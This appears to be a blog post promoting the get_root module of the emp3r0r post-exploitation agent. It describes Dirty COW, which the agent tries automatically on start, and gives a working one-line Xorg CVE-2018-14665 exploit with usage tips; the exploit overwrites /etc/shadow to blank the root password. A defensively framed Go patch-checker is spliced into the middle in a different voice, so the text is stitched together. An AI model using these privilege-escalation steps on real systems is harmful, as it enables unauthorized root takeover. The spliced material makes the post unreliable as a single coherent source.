get root

Happy Chinese New Year!

The coronavirus outbreak in Wuhan keeps me from going outside; actually, I have cancelled all travel plans for this holiday. What do I do at home, then?

get_root

This module can help you get root via:

  • kernel exploits
  • userland LPE exploits, such as exim, sudo
  • previously-implemented backdoors

demo

exploits

dirtycow

Dirtycow is no doubt the most famous Linux LPE exploit so far. According to Wikipedia, the affected Linux versions include:

Earliest kernel version fixed   Linux distribution that uses this
3.2.0-113.155                   Ubuntu 12.04 LTS
3.13.0-100.147                  Ubuntu 14.04 LTS (Linux Mint 17.1)
3.16.36-1+deb8u2                Debian 8
4.4.0-45.66                     Ubuntu 16.04 LTS
4.8.0-26.28                     Ubuntu 16.10
3.10.0-327.36.3                 RHEL 7, CentOS 7
2.6.32-642.6.2                  RHEL 6, CentOS 6
2.6.18-416                      RHEL 5, CentOS 5
3.0.101-84.1                    SLES 11 SP4
3.12.60-52.57.1                 SLES 12 GA LTSS
3.12.62-60.64.8.2               SLES 12 SP1

It's really a long list; you will love this exploit.

I made a version checker with this table, and implemented a Golang version of the dirtycow exploit in the emp3r0r agent.

The agent tries to exploit dirtycow upon start when applicable.
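As an added example (not the emp3r0r agent's own code), this is what a version checker built from that table looks like in Go, written as a patch-status check that an administrator can run against the kernel package version a host reports; the distribution keys, the ".elN" suffix-stripping rule and the "missing component ranks lower" convention are this example's own assumptions.

```go
package main

import (
	"regexp"
	"strconv"
)

// fixedDirtyCow holds the earliest kernel package version carrying the Dirty COW
// fix, per distribution, copied from the table above (keys are this example's own).
var fixedDirtyCow = map[string]string{
	"ubuntu-12.04": "3.2.0-113.155", "ubuntu-14.04": "3.13.0-100.147",
	"ubuntu-16.04": "4.4.0-45.66", "ubuntu-16.10": "4.8.0-26.28",
	"debian-8": "3.16.36-1+deb8u2",
	"rhel-7": "3.10.0-327.36.3", "rhel-6": "2.6.32-642.6.2", "rhel-5": "2.6.18-416",
	"sles-11sp4": "3.0.101-84.1", "sles-12ga": "3.12.60-52.57.1", "sles-12sp1": "3.12.62-60.64.8.2",
}
// reTail strips the ".el7.x86_64"-style tail of RHEL/CentOS package versions so the
// "7" in "el7" is not read as a release number; reDigits then picks out every digit run.
var reTail = regexp.MustCompile(`\.el\d+.*$|\.(x86_64|i686|aarch64)$`)
var reDigits = regexp.MustCompile(`\d+`)

// versionTokens turns "3.16.36-1+deb8u2" into [3 16 36 1 8 2]; separators and letters are ignored.
func versionTokens(v string) []int {
	var out []int
	for _, d := range reDigits.FindAllString(reTail.ReplaceAllString(v, ""), -1) {
		n, _ := strconv.Atoi(d) // only digit runs reach here, so Atoi cannot fail
		out = append(out, n)
	}
	return out
}

// atLeast reports whether version a >= b, component by component. A missing component
// ranks below any present one, so a truncated "4.4.0-45" is reported older than "4.4.0-45.66".
func atLeast(a, b string) bool {
	ta, tb := versionTokens(a), versionTokens(b)
	for i := 0; i < len(ta) && i < len(tb); i++ {
		if ta[i] != tb[i] {
			return ta[i] > tb[i]
		}
	}
	return len(ta) >= len(tb)
}

// DirtyCowPatched reports whether the kernel package version a host reports (via its
// package manager) is at or above the fix for distro; known is false for unlisted distros.
func DirtyCowPatched(distro, kernelPkgVersion string) (patched bool, known bool) {
	fixed, ok := fixedDirtyCow[distro]
	return ok && atLeast(kernelPkgVersion, fixed), ok
}
```

A version string shorter than the table entry (for example the plain `uname -r` output on Ubuntu, which lacks the upload number) is deliberately reported as unpatched, so confirm such cases with the package manager.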

xorg (CVE-2018-14665)

xorg-server versions 1.19 to 1.20.1 are vulnerable; the exploit is pretty simple:

cd /etc;Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su

Several tips:

  • The logfile path has to be relative, thus the cd is required.
  • -fp means font path; its value will appear in the resulting logfile as a single line.
  • You might want to kill $! after the logfile is overwritten; otherwise you lose your current TTY to operate on.
  • /etc/shadow gets overwritten with the logfile, which contains one valid line, root::16431:0:99999:7:::, clearing the root password.
  • su doesn't ask for a password if there's no password; use su -c <command> to execute an arbitrary command as root.
